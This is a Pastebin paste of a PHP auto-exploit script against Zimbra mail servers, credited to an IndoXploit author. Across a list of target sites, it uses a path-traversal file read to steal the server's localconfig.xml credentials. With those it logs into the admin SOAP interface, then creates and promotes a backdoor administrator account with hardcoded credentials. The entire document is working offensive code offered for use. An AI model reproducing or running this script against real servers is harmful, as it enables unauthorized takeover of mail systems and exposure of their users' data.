API tools faq
paste
Advertisement
Guest User

NULL

a guest
Aug 15th, 2016
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.68 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // Created by Tu5b0l3d - IndoXploit
  3. // big thx to: duardo Rubina H.
  4. // http://indoxploit.blogspot.co.id/2015/12/auto-exploiter-zimbra-php.html
  5.  
  6. error_reporting(0);
  7. function ngecek($url,$post){
  8. $ch = curl_init ("$url");
  9. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  10. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  11. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  12. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  13. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  14. curl_setopt ($ch, CURLOPT_POST, 1);
  15. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  16. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  17. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  18. $data2 = curl_exec ($ch);
  19. return $data2;
  20. }
  21.  
  22. function nganu_body($toket,$req){
  23. $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
  24. return $body;
  25. }
  26. if($argv[1]=="a"){
  27. echo "\nusage: php $argv[0] victim.com\n\n";
  28. }
  29. else{
  30. $buka=fopen("list.htm","r"); //buka file list.htm untuk dibaca
  31. $size=filesize("list.htm"); //brp ukuran list.htm
  32. $baca=fread($buka,$size); //baca file list.htm
  33. $sites = explode("\n", $baca); //pecah file list.htm berdasarkan \n atau enter
  34. foreach($sites as $site){ //keluarin satu per satu file yang udh dipecah berdasarkan enter tadi.
  35. }
  36. $target = $site;
  37. $user_baru = "firdytamvan";
  38. $pwd_baru = "anonymous1704";
  39. $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
  40. $link_lfi = "$target/$lfi";
  41. echo "# $target\n";
  42.  
  43. $ch2 = curl_init ("$link_lfi");
  44. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  45. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  46. curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  47. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  48. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  49. curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
  50. curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
  51. curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
  52. $ambil = curl_exec ($ch2);
  53.  
  54. $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
  55. preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
  56.  
  57. $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
  58. preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
  59. if($user[1] or $pwd[1] != ""){
  60. echo "# Pulen nih...\n";
  61.  
  62. $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
  63. <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user[1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
  64.  
  65. $link = "https://$target:7071/service/admin/soap";
  66. $token = ngecek($link,$body);
  67.  
  68. preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
  69.  
  70. if($toket[1]==""){
  71. echo "# gagal ngambil toket\n\n";
  72. break;
  73. }
  74. else{
  75.  
  76. echo "# $toket[1]\n";
  77. $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>");
  78. $body2 = nganu_body($toket[1],$req);
  79.  
  80. $liat = ngecek($link,$body2);
  81. preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
  82. echo "# Creating Account...\n";
  83. $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain[1]</name><password>$pwd_baru</password></CreateAccountRequest>";
  84. $body3 = nganu_body($toket[1],$req2);
  85.  
  86. $liat2 = ngecek($link,$body3);
  87.  
  88. preg_match('/account id="(.*)" name="/', $liat2, $new);
  89. $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
  90. $body4 = nganu_body($toket[1],$req3);
  91.  
  92. $liat3 = ngecek($link,$body4);
  93.  
  94.  
  95. echo "# Sukses\n";
  96. echo "# Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";
  97.  
  98.  
  99.  
  100. }
  101. }
  102. else{
  103. echo "# ngk pulen\n";
  104. }
  105. }
  106. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!